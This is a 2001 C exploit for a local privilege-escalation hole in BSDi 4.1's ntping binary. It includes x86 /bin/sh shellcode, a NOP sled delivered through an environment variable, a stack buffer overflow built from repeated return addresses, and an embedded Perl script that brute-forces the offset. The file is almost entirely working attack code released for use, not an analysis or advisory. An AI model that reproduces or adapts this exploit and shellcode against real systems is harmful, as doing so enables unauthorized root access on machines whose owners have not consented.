/*********************************************************************
 * (ntping) Local root[uid=0] exploit tested on BSDi 4.1 - x86.      *
 * Author: Cody Tubbs (loophole of hhp).                             *
 * Site:   http://www.hhp-programming.net/                           *
 * Email:  pigspigs@yahoo.com                                        *
 * Date:   2/23/2001                                                 *
 *                                                                   *
 * Note: I'm at the library, I don't have enough time to implement   *
 * extended shellcode... setreuid() may prevent this from full       *
 * exploitation, I'll test it out later, for now I'll release it.    *
 * Also, I think I came across this vulnerable on several Linux      *
 * distributions, can't recall setreuid status.                      *
 *********************************************************************/

/* ------------- hhp-offset_bruteforce.pl ---------------
#!/usr/bin/perl
#Standard offset/align brute.
if(@ARGV < 3){
 print "Usage: $0 <start> <stop> <align>\n";
 print "Examp: $0 -10000 0 0\n";
 print "Notes: align = 0 through 3\n";
 exit(0);
}

($start, $stop, $align) = @ARGV;
for(;$start<=$stop;$start+=4){
 system "./x $start $align";
}
**********************************************/

#include <stdio.h>

#define PATH   "/usr/contrib/bin/ntping" // Change path if needed.
#define OFFSET -3000                     // -4000..-2000 Worked. Brute.
#define ALLIGN 0                         // Should not be changed.
#define NOP    0x90                      // x86.
#define DBUF   520                       // 512+4(EBP)+4(EIP).

static char shellcode[] = //BSDi (Replace with setuid, etc code).
 "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
 "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
 "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
 "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
 "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
 "\x02\x02\x02/bin/sh.-c.sh\x69";

long get_sp(void){__asm__("movl %esp,%eax");}

void workit(char *heh){
 fprintf(stderr, "(*) (ntping) Local root[uid=0] exploit.\n");
 fprintf(stderr, "(*) Author: Cody Tubbs (loophole of hhp).\n");
 fprintf(stderr, "(*) Tested on BSDi 4.1 - x86.\n");
 fprintf(stderr, "(*) Usage: %s [offset] [allign(0..3)]\n", heh);
}

main(int argc, char **argv){
 char eipeip[DBUF], buffer[4096], heh[DBUF+1];
 int i, offset, allign;
 long address;
 workit(argv[0]);
 if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
 if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;}

 address = get_sp()-offset;
 
 if(allign>0){
  for(i=0;i<allign;i++){
   eipeip[i] = 0x69; //0x69(TM) :D
  }
 }

 for(i=allign;i<DBUF;i+=4){
  *(long *)&eipeip[i] = address;
 }

 for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
  buffer[i] = NOP;
 }

 memcpy(buffer+i, shellcode, strlen(shellcode));
 memcpy(buffer, "NTPINGEX=", 9);
 putenv(buffer);
 fprintf(stderr, "Ret-addr %#x, offset: %d, allign: %d.\n",address,offset,allign);
 execlp(PATH, "ntping", eipeip, 0);
}
/*                   www.hack.co.za  [6 March 2001]*/